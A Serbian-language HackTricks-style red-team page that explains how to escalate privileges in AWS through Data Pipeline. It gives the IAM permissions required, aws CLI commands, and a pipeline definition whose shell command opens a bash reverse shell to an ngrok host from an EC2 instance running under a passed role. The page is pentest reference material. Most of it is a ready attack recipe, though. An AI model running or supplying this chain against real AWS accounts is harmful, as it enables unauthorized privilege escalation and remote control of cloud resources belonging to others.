AWS - Datapipeline Privesc

Naučite kako da hakujete AWS od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

datapipeline

Za više informacija o datapipeline-u pogledajte:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Korisnici sa ovim dozvolama mogu eskalirati privilegije kreiranjem Data Pipeline-a kako bi izvršili proizvoljne komande koristeći dozvole dodeljene ulozi:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Nakon kreiranja cevovoda, napadač ažurira njegovu definiciju kako bi odredio određene radnje ili kreiranje resursa:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Imajte na umu da uloga u liniji 14, 15 i 27 mora biti uloga koju može preuzeti datapipeline.amazonaws.com, a uloga u liniji 28 mora biti uloga koju može preuzeti ec2.amazonaws.com sa EC2 profilom instance.

Osim toga, EC2 instanca će imati pristup samo ulozi koju može preuzeti EC2 instanca (tako da možete samo ukrasti tu).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` **Definicija fajla za izvršavanje, koju je napadač kreirao, uključuje direktive za izvršavanje komandi** ili kreiranje resursa putem AWS API-ja, iskorišćavajući dozvole uloge Data Pipeline-a kako bi potencijalno stekao dodatne privilegije.

Potencijalni uticaj: Direktno povećanje privilegija na ec2 servisnu ulogu koja je navedena.

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated